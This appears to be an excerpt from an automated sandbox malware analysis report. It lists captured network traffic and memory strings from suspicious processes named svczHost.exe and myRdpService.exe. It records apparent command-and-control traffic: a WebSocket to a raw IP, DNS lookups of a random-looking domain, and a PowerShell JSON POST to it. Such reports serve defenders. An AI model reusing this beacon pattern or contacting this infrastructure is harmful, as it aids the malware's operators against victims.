        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: 2u8wHEz9rUuF7BlOMAv9YQ==Sec-WebSocket-Version: 13
        Source: global trafficDNS traffic detected: DNS query: uyt1n8ded9fb380.com
        Source: unknownHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211831a2f0a5c8263bf9f8f811f60dc99699 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1m6V87rGvKUDAfYXSYUoYe1XozAl6ij6cCk2RnUqOFZsnA1MQzLhWCh44uMkAHILpteNg9bNDpyCCh1yFne%2BNsMpkjGZuTUSamhMePcSIAjDS6BpNzv4OUBmXFZgWN7AA%2FqWqiG1W%2Bs8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df49d3fccf49217-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=10522&sent=1878&recv=749&lost=0&retrans=0&sent_bytes=1670104&recv_bytes=89994&delivery_rate=1854136&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 09:42:39 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{ma
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yk89tA1Cs5X9Z%2FQDyumpqgbUA58aF25y2oPeDSsMnx7LaJlFYTmRVKB%2BsrjMJNHjeyTichBgeXkbLsuWlTETRMin0hvC0qishiJd0khUkK8LsBL%2BviiaQ0Id0nwsvwmGRae6eLpUcaS1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df49d539b53cdf1-SINalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8818&sent=245&recv=160&lost=0&retrans=0&sent_bytes=211706&recv_bytes=19468&delivery_rate=5608194&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 09:42:41 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{marg
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yK84hKtFy1R8OxCBne1t2y3o2OBMrF%2F%2BeYjqv8ddiO9nSqw9nXNUOeUaoKaMinSsrbosDHiacVZUEL5HxfiJgS%2BksnUdyhKKTSilfxi8f28xTSHmooqN8DTQq37ItuTXwQmV8gJ%2FjsBY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df49da1ffc09e79-CDGalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=26135&sent=2779&recv=1220&lost=0&retrans=0&sent_bytes=2525494&recv_bytes=135936&delivery_rate=662517&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 09:42:55 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sb0uUrAzXFQ6BT11I%2BKVuXPhI91dIJ6EjIrOSTbZckK5Y9DFqlAuWOQAYxzoeDS%2FlKj%2FoJkmF0UNsmqVoh7avU4HAP%2BTLcgbhR8vV00Jx4XEy%2B54wZTrIJ6yE0i2WUc9k4IjwPJgcZl%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df49db56f27cdf1-SINalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7916&sent=311&recv=199&lost=0&retrans=0&sent_bytes=268689&recv_bytes=24006&delivery_rate=6239316&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 09:42:57 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pr
        Source: powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.css
        Source: powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.jpg
        Source: powershell.exe, 00000018.00000002.3303975051.00000203F5532000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.:j
        Source: powershell.exe, 00000002.00000002.2739318814.000001AC1F6E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2658354126.0000026921256000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3412391494.00000226FB537000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3839967276.0000015199A32000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3303975051.00000203F54FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3286821473.0000018B69B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: powershell.exe, 00000002.00000002.2739318814.000001AC1F6E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2658354126.0000026921230000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3412391494.00000226FB537000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3839967276.0000015199A32000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3303975051.00000203F54D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3261435061.0000018B68E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: powershell.exe, 00000008.00000002.2659602766.0000026921670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
        Source: powershell.exe, 00000008.00000002.2659602766.0000026921670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof/crl/products/MicTimStaPCA_2010-07-01.crl0Z
        Source: powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://html4/loose.dtd
        Source: powershell.exe, 00000002.00000002.2800553876.000001AC2F8F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2800553876.000001AC2FA89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690A74C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2654660804.0000026919177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3240844054.00000203901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.0000020381455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3240844054.0000020390073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B014EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3223482827.0000018B10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1FAAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzo
        Source: powershell.exe, 00000008.00000002.2635351639.000002690A5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngh
        Source: powershell.exe, 00000008.00000002.2661526576.0000026921AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlf
        Source: powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E377A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B00D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: svczHost.exe, svczHost.exe, 00000014.00000002.3850109960.00007FF70A67F000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
        Source: powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1F881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.0000026909101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E33C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.3850109960.00007FF70A67F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.0000020380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B00001000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2971436736.00000226E377A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B00D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: svczHost.exe, 00000014.00000002.3841352586.000001519CC9B000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3841352586.000001519CCB1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://uyt1n8ded9fb380.com:443/x
        Source: powershell.exe, 00000008.00000002.2635351639.000002690A0A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2740483057.000001AC1FAAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690936A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2986898619.000002038022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2980649068.0000018B0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzo
        Source: powershell.exe, 00000008.00000002.2635351639.000002690A5F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2635351639.000002690A5CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
        Source: myRdpService.exe, myRdpService.exe, 0000002D.00000002.3840377098.0000012A37826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
        Source: svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.gstatic.com/generate_204y
        Source: myRdpService.exe, 0000002D.00000002.3841638104.0000012A3A980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com:80/
        Source: powershell.exe, 00000002.00000002.2806222414.000001AC37AB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: powershell.exe, 00000002.00000002.2739318814.000001AC1F6E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2658354126.0000026921256000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3412391494.00000226FB537000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3839967276.0000015199A32000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3303975051.00000203F54FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3286821473.0000018B69B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.3850109960.00007FF70A67F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
        Source: powershell.exe, 0000000D.00000002.3347031829.00000226F3463000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000000.2951489622.00007FF70A7F1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3850109960.00007FF70A67F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3850480563.00007FF70A7F1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519D648000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002D.00000002.3845815946.00007FF7A62D8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
        Source: svczHost.exe, myRdpService.exeString found in binary or memory: https://aka.ms/nativeaot-c
        Source: myRdpService.exe, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
        Source: myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
        Source: powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000000.2951489622.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.3843098469.000001519DF46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002D.00000000.3446062033.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
